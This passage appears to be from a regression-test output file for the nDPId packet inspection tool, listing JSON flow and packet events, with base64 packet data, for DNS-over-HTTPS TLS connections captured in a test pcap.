b24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJ